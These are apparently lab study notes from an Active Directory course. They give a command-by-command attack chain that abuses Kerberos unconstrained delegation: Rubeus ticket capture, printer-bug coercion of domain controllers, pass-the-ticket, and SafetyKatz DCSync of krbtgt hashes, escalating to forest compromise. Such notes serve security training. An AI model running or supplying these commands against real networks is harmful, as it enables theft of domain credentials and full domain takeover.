Skip to content

Unconstrained Deletegation

1. Attack Overview

This attack chain exploits machines configured with Unconstrained Delegation. When a user (or computer) authenticates to such a machine via Kerberos, their TGT (Ticket Granting Ticket) is stored in the memory (LSASS) of that machine. By using the Printer Bug, we can "coerce" a Domain Controller to authenticate to our compromised machine, effectively handing us its TGT.

2. Phase 1: Enumeration & Initial Compromise

Identify targets with Unconstrained Delegation enabled: 

Get-DomainComputer -Unconstrained
Get-DomainComputer -Unconstrained | select -ExpandProperty name
Target found: DCORP-APPSRV

Prerequisite: You must have Local Admin rights on the target server to dump tickets from memory. In this lab, we used appadmin credentials to gain access via PSRemoting:

# Get a TGT for the local admin
Rubeus.exe asktgt /user:appadmin /aes256:<HASH> /ptt

# Enter the session
winrs -r:dcorp-appsrv cmd

3. Phase 2: Compromising the Child Domain (dollarcorp)

Targeting the local Domain Controller (dcorp-dc).

Start Rubeus Monitor on dcorp-appsrv to catch the incoming ticket: 

Rubeus.exe monitor /targetuser:DCORP-DC$ /interval:5 /nowrap

Trigger the Printer Bug from your Student VM: 

MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local

Pass-the-Ticket (PtT): Copy the Base64 TGT from the monitor and inject it into your session: 

Rubeus.exe ptt /ticket:<BASE64_TGT>

DCSync: Extract the krbtgt hash to achieve Domain Admin persistence: 

SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt"

4. Phase 3: Forest Escalation (Enterprise Admin)

To compromise the entire forest, we repeat the process but target the Parent Domain Controller (mcorp-dc).

Monitor for the Parent DC on dcorp-appsrv: 

Rubeus.exe monitor /targetuser:MCORP-DC$ /interval:5 /nowrap

Trigger Printer Bug against Parent DC: 

MS-RPRN.exe \\mcorp-dc.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local

DCSync for Enterprise Secrets: After injecting the MCORP-DC$ ticket: 

SafetyKatz.exe "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local"

  1. Troubleshooting & Mental Models The "Time" Factor (Error 1398)

Kerberos is extremely sensitive to time. If your Student VM is more than 5 minutes apart from the DC, the ticket injection will fail.

Fix: net time \\dcorp-dc.dollarcorp.moneycorp.local /set /y

The "Expiration" Factor

A TGT captured via monitor has a specific lifetime (usually 10 hours). If you try to use a Base64 string from a previous lab session, it will be expired.

Fix: You must re-run MS-RPRN.exe to generate a fresh ticket every time you restart the attack.

Why does it work?

  • Coercion: MS-RPRN forces the DC to talk to us.

  • Delegation: The DC's TGT is "gifted" to our server's memory.

  • Impersonation: We use that TGT to pretend we are the DC and ask for the database (DCSync).